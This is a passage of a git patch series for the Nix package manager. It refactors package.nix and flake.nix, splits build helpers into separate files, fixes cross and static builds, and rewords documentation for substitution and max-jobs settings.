stdenv.hostPlatform.isStatic) - '' - # Copy libboost_context so we don't get all of Boost in our closure. - # https://github.com/NixOS/nixpkgs/issues/45462 - mkdir -p $out/lib - cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib - rm -f $out/lib/*.a - ${lib.optionalString stdenv.hostPlatform.isLinux '' - chmod u+w $out/lib/*.so.* - patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString stdenv.hostPlatform.isDarwin '' - for LIB in $out/lib/*.dylib; do - chmod u+w $LIB - install_name_tool -id $LIB $LIB - install_name_tool -delete_rpath ${boost}/lib/ $LIB || true - done - install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; + preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + ${lib.optionalString stdenv.hostPlatform.isLinux '' + chmod u+w $out/lib/*.so.* + patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* + ''} + ${lib.optionalString stdenv.hostPlatform.isDarwin '' + for LIB in $out/lib/*.dylib; do + chmod u+w $LIB + install_name_tool -id $LIB $LIB + install_name_tool -delete_rpath ${boost}/lib/ $LIB || true + done + install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib + ''} + ''; configureFlags = lib.optionals stdenv.isLinux [ "--with-boost=${boost}/lib" "--with-sandbox-shell=${sh}/bin/busybox" ] - ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ + ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) 
"LDFLAGS=-fuse-ld=gold" - ] ++ [ "--sysconfdir=/etc" ] ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] - ++ lib.optionals finalAttrs.doCheck ([ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] - ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]) + ++ lib.optionals finalAttrs.doCheck ( + [ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] + ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ]) ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; enableParallelBuilding = true; makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; - doCheck = true; - installFlags = "sysconfdir=$(out)/etc"; postInstall = '' From 7355a48b1a4ce2e393598c2a72ef520cba9d172d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 15:55:18 -0500 Subject: [PATCH 022/654] flake.lock: Update Nixpkgs to fix static build MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The problem was since switching to use libgit2, we had a package in our closure (`http-parser`) that was always trying to build as a shared object. 
Underlying Nixpkgs PR (a 23.05 backport) https://github.com/NixOS/nixpkgs/pull/271202 Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/9ba29e2346bc542e9909d1021e8fd7d4b3f64db0' (2023-11-13) → 'github:NixOS/nixpkgs/36c4ac09e9bebcec1fa7b7539cddb0c9e837409c' (2023-11-30) --- flake.lock | 8 ++++---- flake.nix | 8 +++++++- 2 files changed, 11 insertions(+), 5 deletions(-) diff --git a/flake.lock b/flake.lock index f120d3b5f..3cb9e72c9 100644 --- a/flake.lock +++ b/flake.lock @@ -50,16 +50,16 @@ }, "nixpkgs": { "locked": { - "lastModified": 1700748986, - "narHash": "sha256-/nqLrNU297h3PCw4QyDpZKZEUHmialJdZW2ceYFobds=", + "lastModified": 1701355166, + "narHash": "sha256-4V7XMI0Gd+y0zsi++cEHd99u3GNL0xSTGRmiWKzGnUQ=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "9ba29e2346bc542e9909d1021e8fd7d4b3f64db0", + "rev": "36c4ac09e9bebcec1fa7b7539cddb0c9e837409c", "type": "github" }, "original": { "owner": "NixOS", - "ref": "nixos-23.05-small", + "ref": "staging-23.05", "repo": "nixpkgs", "type": "github" } diff --git a/flake.nix b/flake.nix index e2e510cbc..dbd45f053 100644 --- a/flake.nix +++ b/flake.nix @@ -1,7 +1,13 @@ { description = "The purely functional package manager"; - inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small"; + # TODO Go back to nixos-23.05-small once + # https://github.com/NixOS/nixpkgs/pull/271202 is merged. + # + # Also, do not grab arbitrary further staging commits. This PR was + # carefully made to be based on release-23.05 and just contain + # rebuild-causing changes to packages that Nix actually uses. 
+ inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; From 51adfb9b277fe54ad03fa2c9981585f123fcc200 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 02:21:17 +0100 Subject: [PATCH 023/654] reword documentation on settings and attributes related to substitution - add links - be more concise - clarify the distinction between `preferLocalBuild` and `allowSubstitutes` --- .../src/language/advanced-attributes.md | 23 +++++-------------- src/libstore/globals.hh | 4 +--- 2 files changed, 7 insertions(+), 20 deletions(-) diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md index 282b75af2..5a6c00cd4 100644 --- a/doc/manual/src/language/advanced-attributes.md +++ b/doc/manual/src/language/advanced-attributes.md @@ -257,29 +257,18 @@ Derivations can declare some infrequently used optional attributes. of the environment (typically, a few hundred kilobyte). - [`preferLocalBuild`]{#adv-attr-preferLocalBuild}\ - If this attribute is set to `true` and [distributed building is - enabled](../advanced-topics/distributed-builds.md), then, if - possible, the derivation will be built locally instead of forwarded - to a remote machine. This is appropriate for trivial builders - where the cost of doing a download or remote build would exceed - the cost of building locally. + If this attribute is set to `true` and [distributed building is enabled](../advanced-topics/distributed-builds.md), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine. + This is useful for derivations that are cheapest to build locally. 
- [`allowSubstitutes`]{#adv-attr-allowSubstitutes}\ - If this attribute is set to `false`, then Nix will always build this - derivation; it will not try to substitute its outputs. This is - useful for very trivial derivations (such as `writeText` in Nixpkgs) - that are cheaper to build than to substitute from a binary cache. + If this attribute is set to `false`, then Nix will always build this derivation (locally or remotely); it will not try to substitute its outputs. + This is useful for derivations that are cheaper to build than to substitute. - You may disable the effects of this attibute by enabling the - `always-allow-substitutes` configuration option in Nix. + This attribute can be ignored by setting [`always-allow-substitutes`](@docroot@/command-ref/conf-file.md#conf-always-allow-substitutes) to `true`. > **Note** > - > You need to have a builder configured which satisfies the - > derivation’s `system` attribute, since the derivation cannot be - > substituted. Thus it is usually a good idea to align `system` with - > `builtins.currentSystem` when setting `allowSubstitutes` to - > `false`. For most trivial derivations this should be the case. + > If set to `false`, the [`builder`](./derivations.md#attr-builder) should be able to run on the system type specified in the [`system` attribute](./derivations.md#attr-system), since the derivation cannot be substituted. - [`__structuredAttrs`]{#adv-attr-structuredAttrs}\ If the special attribute `__structuredAttrs` is set to `true`, the other derivation diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..36ba51e23 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -268,9 +268,7 @@ public: Setting alwaysAllowSubstitutes{ this, false, "always-allow-substitutes", R"( - If set to `true`, Nix will ignore the `allowSubstitutes` attribute in - derivations and always attempt to use available substituters. 
- For more information on `allowSubstitutes`, see [the manual chapter on advanced attributes](../language/advanced-attributes.md). + If set to `true`, Nix will ignore the [`allowSubstitutes`](@docroot@/language/advanced-attributes.md) attribute in derivations and always attempt to use [available substituters](#conf-substituters). )"}; Setting buildersUseSubstitutes{ From 368fdb482da039fd40a1a51bbf851c54f65eb4c5 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 03:06:47 +0100 Subject: [PATCH 024/654] reword description of the `builders-use-substitutes` setting --- src/libstore/globals.hh | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..dcdcd31d5 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -276,13 +276,10 @@ public: Setting buildersUseSubstitutes{ this, false, "builders-use-substitutes", R"( - If set to `true`, Nix will instruct remote build machines to use - their own binary substitutes if available. In practical terms, this - means that remote hosts will fetch as many build dependencies as - possible from their own substitutes (e.g, from `cache.nixos.org`), - instead of waiting for this host to upload them all. This can - drastically reduce build times if the network connection between - this computer and the remote build host is slow. + If set to `true`, Nix will instruct [remote build machines](#conf-builders) to use their own [`substituters`](#conf-substituters) if available. + + It means that remote build hosts will fetch as many dependencies as possible from their own substituters (e.g, from `cache.nixos.org`) instead of waiting for the local machine to upload them all. + This can drastically reduce build times if the network connection between the local machine and the remote build host is slow. 
)"}; Setting reservedSize{this, 8 * 1024 * 1024, "gc-reserved-space", From 5b281ddf50775ff37577f80cd3f1f7dbf76c9762 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 02:13:11 +0100 Subject: [PATCH 025/654] reword description of the `max-jobs` setting - remove prose for the default value, which is shown programmatically - add note on how this relates to `cores` - add link to mentioned derivation attribute --- src/libstore/globals.hh | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..7a30c5ae2 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -151,13 +151,18 @@ public: MaxBuildJobsSetting maxBuildJobs{ this, 1, "max-jobs", R"( - This option defines the maximum number of jobs that Nix will try to - build in parallel. The default is `1`. The special value `auto` - causes Nix to use the number of CPUs in your system. `0` is useful - when using remote builders to prevent any local builds (except for - `preferLocalBuild` derivation attribute which executes locally - regardless). It can be overridden using the `--max-jobs` (`-j`) - command line switch. + Maximum number of jobs that Nix will try to build locally in parallel. + + The special value `auto` causes Nix to use the number of CPUs in your system. + Use `0` to disable local builds and directly use the remote machines specified in [`builders`](#conf-builders). + This will not affect derivations that have [`preferLocalBuild = true`](@docroot@/language/advanced-attributes.md#adv-attr-preferLocalBuild), which are always built locally. + + > **Note** + > + > The number of CPU cores to use for each build job is independently determined by the [`cores`](#conf-cores) setting. + + + The setting can be overridden using the `--max-jobs` (`-j`) command line switch. 
)", {"build-max-jobs"}}; From 2c3749a335d4462412ac73eb77a81d949e1e8ba6 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 16:08:06 +0000 Subject: [PATCH 026/654] Fix cross builds --- package.nix | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/package.nix b/package.nix index bed77ba3b..9f30eef2f 100644 --- a/package.nix +++ b/package.nix @@ -123,6 +123,10 @@ stdenv.mkDerivation (finalAttrs: { openssl sqlite xz + + # These could be checkInputs but the configure phase fails w/o them + gtest + rapidcheck ] ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid @@ -137,14 +141,13 @@ stdenv.mkDerivation (finalAttrs: { doCheck = true; checkInputs = [ - gtest - rapidcheck + # see buildInputs. The configure script always wants its test libs ]; nativeCheckInputs = [ git - mercurial # FIXME: remove? only needed for tests - openssh # only needed for tests (ssh-keygen) + mercurial + openssh ]; propagatedBuildInputs = [ From ca598328085fe7a379bff8777031101fba80921b Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 16:36:59 +0000 Subject: [PATCH 027/654] Fix coverage.nix --- coverage.nix | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/coverage.nix b/coverage.nix index 2390ef52d..f952d8b09 100644 --- a/coverage.nix +++ b/coverage.nix @@ -14,19 +14,21 @@ releaseTools.coverageAnalysis { inherit (nix) src - configureFlags - nativeBuildInputs buildInputs - #checkInputs + nativeBuildInputs + propagatedBuildInputs + configureFlags + makeFlags + installFlags + doInstallCheck + installCheckFlags + installCheckTarget ; enableParallelBuilding = true; dontInstall = false; - doInstallCheck = true; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - lcovFilter = [ "*/boost/*" "*-tab.*" ]; hardeningDisable = ["fortify"]; From 118fa9689ab0e6d12b360708177f9a1b56f3d466 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 
2023 16:42:01 +0000 Subject: [PATCH 028/654] Create internal-api-docs.nix --- flake.nix | 17 +---------------- internal-api-docs.nix | 24 ++++++++++++++++++++++++ 2 files changed, 25 insertions(+), 16 deletions(-) create mode 100644 internal-api-docs.nix diff --git a/flake.nix b/flake.nix index c0841a76d..b1c3a777e 100644 --- a/flake.nix +++ b/flake.nix @@ -482,22 +482,7 @@ coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = nixpkgsFor.x86_64-linux.native.nix.overrideAttrs (old: { - pname = "nix-internal-api-docs"; - - configureFlags = old.configureFlags ++ [ "--enable-internal-api-docs" ]; - nativeBuildInputs = old.nativeBuildInputs ++ [ nixpkgsFor.x86_64-linux.native.doxygen ]; - - dontBuild = true; - doCheck = false; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; - }); + internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./internal-api-docs.nix {}; # System tests. 
tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { diff --git a/internal-api-docs.nix b/internal-api-docs.nix new file mode 100644 index 000000000..ddd3fa891 --- /dev/null +++ b/internal-api-docs.nix @@ -0,0 +1,24 @@ +{ nix +, doxygen +}: + +nix.overrideAttrs (old: { + pname = "nix-internal-api-docs"; + + configureFlags = old.configureFlags ++ [ + "--enable-internal-api-docs" + ]; + nativeBuildInputs = old.nativeBuildInputs ++ [ + doxygen + ]; + + dontBuild = true; + doCheck = false; + + installTargets = [ "internal-api-html" ]; + + postInstall = '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + ''; +}) From 19d41fb20a45d2bf66f78813514bf5c5fd420a8b Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 17:25:47 +0000 Subject: [PATCH 029/654] Fix stuff --- flake.nix | 230 +++--------------------------------------- package.nix | 60 ++++++----- test-nix-versions.nix | 50 +++++++++ 3 files changed, 96 insertions(+), 244 deletions(-) create mode 100644 test-nix-versions.nix diff --git a/flake.nix b/flake.nix index b1c3a777e..fbce13604 100644 --- a/flake.nix +++ b/flake.nix @@ -12,6 +12,14 @@ let inherit (nixpkgs) lib; + # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981 + # Not an "idiomatic" flake input because: + # - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730 + # - Subflake would download redundant and huge parent flake + # - No git tree hash support: https://github.com/NixOS/nix/issues/6044 + inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; })) + fileset; + officialRelease = false; # Set to true to build the release notes for the next release. 
@@ -56,57 +64,6 @@ }) stdenvs); - # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981 - # Not an "idiomatic" flake input because: - # - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730 - # - Subflake would download redundant and huge parent flake - # - No git tree hash support: https://github.com/NixOS/nix/issues/6044 - inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; })) - fileset; - - baseFiles = - # .gitignore has already been processed, so any changes in it are irrelevant - # at this point. It is not represented verbatim for test purposes because - # that would interfere with repo semantics. - fileset.fileFilter (f: f.name != ".gitignore") ./.; - - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. - ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; - - nixSrc = fileset.toSource { - root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles - ./boehmgc-coroutine-sp-fallback.diff - ./doc - ./misc - ./precompiled-headers.h - ./src - ./unit-test-data - ./COPYING - ./scripts/local.mk - functionalTestFiles - ]); - }; - # Memoize nixpkgs for different platforms for efficiency. nixpkgsFor = forAllSystems (system: let @@ -131,130 +88,6 @@ cross = forAllCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); }); - commonDeps = - { pkgs - , isStatic ? pkgs.stdenv.hostPlatform.isStatic - }: - with pkgs; rec { - # Use "busybox-sandbox-shell" if present, - # if not (legacy) fallback and hope it's sufficient. 
- sh = pkgs.busybox-sandbox-shell or (busybox.override { - useMusl = true; - enableStatic = true; - enableMinimal = true; - extraConfig = '' - CONFIG_FEATURE_FANCY_ECHO y - CONFIG_FEATURE_SH_MATH y - CONFIG_FEATURE_SH_MATH_64 y - - CONFIG_ASH y - CONFIG_ASH_OPTIMIZE_FOR_SIZE y - - CONFIG_ASH_ALIAS y - CONFIG_ASH_BASH_COMPAT y - CONFIG_ASH_CMDCMD y - CONFIG_ASH_ECHO y - CONFIG_ASH_GETOPTS y - CONFIG_ASH_INTERNAL_GLOB y - CONFIG_ASH_JOB_CONTROL y - CONFIG_ASH_PRINTF y - CONFIG_ASH_TEST y - ''; - }); - - configureFlags = - lib.optionals stdenv.isLinux [ - "--with-boost=${boost-nix}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] - ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ - "LDFLAGS=-fuse-ld=gold" - ]; - - testConfigureFlags = [ - "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" - ] ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]; - - internalApiDocsConfigureFlags = [ - "--enable-internal-api-docs" - ]; - - inherit (pkgs.buildPackages) changelog-d; - - nativeBuildDeps = - [ - buildPackages.bison - buildPackages.flex - (lib.getBin buildPackages.lowdown-nix) - buildPackages.mdbook - buildPackages.mdbook-linkcheck - buildPackages.autoconf-archive - buildPackages.autoreconfHook - buildPackages.pkg-config - - # Tests - buildPackages.git - buildPackages.mercurial # FIXME: remove? only needed for tests - buildPackages.jq # Also for custom mdBook preprocessor. 
- buildPackages.openssh # only needed for tests (ssh-keygen) - ] - ++ lib.optionals stdenv.hostPlatform.isLinux [(buildPackages.util-linuxMinimal or buildPackages.utillinuxMinimal)] - # Official releases don't have rl-next, so we don't need to compile a changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d - ; - - buildDeps = - [ curl - bzip2 xz brotli editline - openssl sqlite - libarchive - (pkgs.libgit2.overrideAttrs (attrs: { - src = libgit2; - version = libgit2.lastModifiedDate; - cmakeFlags = (attrs.cmakeFlags or []) ++ ["-DUSE_SSH=exec"]; - })) - boost-nix - lowdown-nix - libsodium - ] - ++ lib.optionals stdenv.isLinux [libseccomp] - ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid; - - checkDeps = [ - gtest - rapidcheck - ]; - - internalApiDocsDeps = [ - buildPackages.doxygen - ]; - - awsDeps = lib.optional (stdenv.isLinux || stdenv.isDarwin) - (aws-sdk-cpp.override { - apis = ["s3" "transfer"]; - customMemoryManagement = false; - }); - - propagatedDeps = - [ ((boehmgc.override { - enableLargeConfig = true; - }).overrideAttrs(o: { - patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff - - # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff - ]; - }) - ) - nlohmann_json - ]; - }; - installScriptFor = systems: with nixpkgsFor.x86_64-linux.native; runCommand "installer-script" @@ -289,50 +122,11 @@ echo "file installer $out/install" >> $out/nix-support/hydra-build-products ''; - testNixVersions = pkgs: client: daemon: with commonDeps { inherit pkgs; }; with pkgs.lib; pkgs.stdenv.mkDerivation { - NIX_DAEMON_PACKAGE = daemon; - NIX_CLIENT_PACKAGE = client; - name = - "nix-tests" - + optionalString - (versionAtLeast daemon.version "2.4pre20211005" && - versionAtLeast client.version "2.4pre20211005") - "-${client.version}-against-${daemon.version}"; - inherit version; - - src = fileset.toSource { - root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - 
configureFiles - topLevelBuildFiles - functionalTestFiles - ]); + testNixVersions = pkgs: client: daemon: + pkgs.callPackage ./test-nix-versions.nix { + inherit client daemon fileset; }; - VERSION_SUFFIX = versionSuffix; - - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ awsDeps ++ checkDeps; - propagatedBuildInputs = propagatedDeps; - - enableParallelBuilding = true; - - configureFlags = - testConfigureFlags # otherwise configure fails - ++ [ "--disable-build" ]; - dontBuild = true; - doInstallCheck = true; - - installPhase = '' - mkdir -p $out - ''; - - installCheckPhase = '' - mkdir -p src/nix-channel - make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES - ''; - }; - binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { inherit nix; }; @@ -491,7 +285,7 @@ # on a particular version of Nixpkgs. evalNixpkgs = let - inherit (nixpkgsFor.x86_64-linux.native) runCommand nix nixpkgs-regression; + inherit (nixpkgsFor.x86_64-linux.native) runCommand nix; in runCommand "eval-nixos" { buildInputs = [ nix ]; } '' diff --git a/package.nix b/package.nix index 9f30eef2f..e4c66958b 100644 --- a/package.nix +++ b/package.nix @@ -43,6 +43,30 @@ let version = lib.fileContents ./.version + versionSuffix; canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + + filesets = { + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; + + configureFiles = fileset.unions [ + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. 
+ ./README.md + ]; + + topLevelBuildFiles = fileset.unions [ + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + ]; + + functionalTestFiles = fileset.unions [ + ./tests/functional + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) + ]; + }; in stdenv.mkDerivation (finalAttrs: { @@ -51,33 +75,13 @@ stdenv.mkDerivation (finalAttrs: { src = let - baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. - ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; in fileset.toSource { root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles + fileset = fileset.intersect filesets.baseFiles (fileset.unions [ + filesets.configureFiles + filesets.topLevelBuildFiles ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc @@ -86,7 +90,7 @@ stdenv.mkDerivation (finalAttrs: { ./unit-test-data ./COPYING ./scripts/local.mk - functionalTestFiles + filesets.functionalTestFiles ]); }; @@ -231,8 +235,12 @@ stdenv.mkDerivation (finalAttrs: { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru.perl-bindings = callPackage ./perl { - inherit fileset stdenv; + passthru ={ + inherit filesets; + + perl-bindings = callPackage ./perl { + inherit fileset stdenv; + }; }; meta.platforms = lib.platforms.unix; diff --git a/test-nix-versions.nix b/test-nix-versions.nix new file mode 100644 index 000000000..15f6cd8d0 --- /dev/null +++ b/test-nix-versions.nix @@ -0,0 +1,50 @@ +{ lib +, fileset +, stdenv +, client +, daemon +}: + +stdenv.mkDerivation { + NIX_DAEMON_PACKAGE = daemon; + NIX_CLIENT_PACKAGE = client; + name = + "nix-tests" 
+ + lib.optionalString + (lib.versionAtLeast daemon.version "2.4pre20211005" && + lib.versionAtLeast client.version "2.4pre20211005") + "-${client.version}-against-${daemon.version}"; + + inherit (client) + version + VERSION_SUFFIX + nativeBuildInputs + buildInputs + propagatedBuildInputs + ; + + src = fileset.toSource { + root = ./.; + fileset = with client.passthru.filesets; + fileset.intersect baseFiles (fileset.unions [ + configureFiles + topLevelBuildFiles + functionalTestFiles + ]); + }; + + configureFlags = client.configureFlags # otherwise configure fails + ++ [ "--disable-build" ]; + + dontBuild = true; + doInstallCheck = true; + + installPhase = '' + mkdir -p $out + ''; + + installCheckPhase = '' + mkdir -p src/nix-channel + make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES + ''; +} From 0ca49b0c8663ae82931780ae3f1f45115b966285 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 12:47:07 -0500 Subject: [PATCH 030/654] Add installing unit test flags --- package.nix | 37 ++++++++++++++++++++++++++----------- 1 file changed, 26 insertions(+), 11 deletions(-) diff --git a/package.nix b/package.nix index e4c66958b..c1a3b9455 100644 --- a/package.nix +++ b/package.nix @@ -38,6 +38,17 @@ , sqlite , util-linux , xz + +# Configuration Options +# +# This probably seems like too many degrees of freedom, but it +# faithfully reflects how the underlying configure + make build system +# work. The top-level flake.nix will choose useful combinations. + +# Whether to install unit tests. This is useful when cross compiling +# since we cannot run them natively during the build, but can do so +# later. +, installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform }: let @@ -69,7 +80,13 @@ let }; in -stdenv.mkDerivation (finalAttrs: { +stdenv.mkDerivation (finalAttrs: let + + # Either running the unit tests during the build, or installing them + # to be run later, requiresthe unit tests to be built. 
+ buildUnitTests = finalAttrs.doCheck || installUnitTests; + +in { pname = "nix"; inherit version; @@ -97,7 +114,7 @@ stdenv.mkDerivation (finalAttrs: { VERSION_SUFFIX = versionSuffix; outputs = [ "out" "dev" "doc" ] - ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; + ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ bison @@ -142,7 +159,7 @@ stdenv.mkDerivation (finalAttrs: { }) ; - doCheck = true; + doCheck = stdenv.hostPlatform != stdenv.buildPlatform; checkInputs = [ # see buildInputs. The configure script always wants its test libs @@ -190,14 +207,12 @@ stdenv.mkDerivation (finalAttrs: { "LDFLAGS=-fuse-ld=gold" ++ [ "--sysconfdir=/etc" ] ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" - ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] - ++ lib.optionals finalAttrs.doCheck ( - [ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] - ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]) + ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" + ++ lib.optionals installUnitTests [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ] ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; enableParallelBuilding = true; From ce598bae144c49c61b33cdf55679ef597ede9485 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 14:10:09 -0500 Subject: [PATCH 031/654] WIP --- coverage.nix | 8 --- flake.nix | 7 ++- internal-api-docs.nix | 24 ------- package.nix | 143 ++++++++++++++++++++++++++++++++---------- test-nix-versions.nix | 35 ----------- 5 files changed, 117 insertions(+), 100 deletions(-) delete mode 100644 internal-api-docs.nix diff --git a/coverage.nix 
